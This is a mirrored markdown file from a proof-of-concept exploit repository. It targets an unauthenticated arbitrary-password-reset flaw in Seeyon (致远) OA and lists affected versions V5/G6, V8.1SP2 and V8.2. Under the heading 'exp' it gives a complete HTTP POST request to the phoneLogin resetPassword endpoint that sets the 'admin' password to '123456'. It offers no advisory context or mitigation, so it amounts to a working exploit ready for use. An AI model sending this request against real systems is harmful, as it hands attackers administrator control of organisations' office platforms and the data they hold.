mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 11:26:58 +00:00
20 lines
347 B
Markdown
20 lines
347 B
Markdown
|
# 致远OA前台任意用户密码修改漏洞
|
||
|
|
|
||
|
|
## 版本
|
||
|
|
```
|
||
|
|
Seeyon OA=V5/G6
|
||
|
|
Seeyon OA=V8.1SP2
|
||
|
|
Seeyon OA=V8.2
|
||
|
|
```
|
||
|
|
## exp
|
||
|
|
```
|
||
|
|
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
|
||
|
|
Host: ip
|
||
|
|
User-Agent: Go-http-client/1.1
|
||
|
|
Content-Length: 24
|
||
|
|
Content-Type: application/json
|
||
|
|
Accept-Encoding: gzip
|
||
|
|
|
||
|
|
{"loginName":"admin","password":"123456"}
|
||
|
|
```
|